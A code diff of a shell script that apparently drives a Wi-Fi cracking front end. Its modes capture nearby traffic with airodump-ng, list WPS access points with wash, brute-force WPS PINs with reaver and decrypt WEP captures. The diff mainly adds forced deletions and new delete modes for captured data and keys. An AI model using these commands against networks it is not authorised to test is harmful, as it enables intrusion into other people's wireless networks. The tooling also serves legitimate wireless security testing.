@@ -56,10 +56,10 @@ if [ "$1" == 'enableMode' ]; then
 fi 
 
 if [ "$1" == 'getWlanInformation' ]; then 
-    if [ -f $2/wlanInfo-01.csv ]; then rm $2/wlanInfo-* ; fi
+    if [ -f $2/wlanInfo-01.csv ]; then rm -f $2/wlanInfo-* ; fi
     airodump-ng -w $2/wlanInfo wlan0 & sleep $3 && kill $!
     if [ -f /usr/bin/wash ]; then 
-       if [ -f $pathReaver/wpsInfo.txt ]; then rm $pathReaver/wpsInfo.txt ; fi
+       if [ -f $pathReaver/wpsInfo.txt ]; then rm -f $pathReaver/wpsInfo.txt ; fi
        wash -f $2/wlanInfo-01.cap -C -o $pathReaver/wpsInfo.txt
     fi
 fi 
@@ -74,9 +74,20 @@ fi
 
 if [ "$1" == 'deleteCaptured' ]; then 
     ls -al $2/capturedData/$3/"$4"*.*; 
-    rm $2/capturedData/$3/"$4"*.*; 
+    rm -f $2/capturedData/$3/"$4"*.*; 
 fi 
 
+if [ "$1" == 'deleteARP' ]; then 
+    ls -al /home/user/"$2"*.*; 
+    rm -f /home/user/"$2"*.*; 
+fi 
+
+if [ "$1" == 'deleteKey' ]; then 
+    ls -al $2/keys/$3; 
+    rm -f $2/keys/$3; 
+fi 
+
+
 #open a new xterm window for the following requests
 
 if [ "$1" == 'capture' ]; then
@@ -128,7 +139,7 @@ if [ "$1" == 'decryptWEP' ]; then
 fi 
 
 if  [ "$1" == 'reaver' ]; then 
-    reaver -i wlan0 -b $2 -e $3 -a -E -vv 
+    reaver -i wlan0 -b $2 -a -E -S -v
 fi 
 
 if  [ "$1" == 'wash' ]; then 
@@ -136,11 +147,11 @@ if  [ "$1" == 'wash' ]; then
 fi 
 
 if  [ "$1" == 'copyReaver' ]; then 
-    cp -pr $2/reaver $3 && chmod 755 $3/reaver && if [ -f /usr/bin/reaver ]; then rm /usr/bin/reaver; fi && ln -s $3/reaver /usr/bin/reaver
+    cp -pr $2/reaver $3 && chmod 755 $3/reaver && if [ -f /usr/bin/reaver ]; then rm -f /usr/bin/reaver; fi && ln -s $3/reaver /usr/bin/reaver
 fi 
 
 if  [ "$1" == 'copyWash' ]; then 
-    cp -pr $2/wash $3 && chmod 755 $3/wash && if [ -f /usr/bin/wash ]; then rm /usr/bin/wash; fi && ln -s $3/wash /usr/bin/wash
+    cp -pr $2/wash $3 && chmod 755 $3/wash && if [ -f /usr/bin/wash ]; then rm -f /usr/bin/wash; fi && ln -s $3/wash /usr/bin/wash
 fi 
 
 if  [ "$1" == 'copyReaverDB' ]; then 
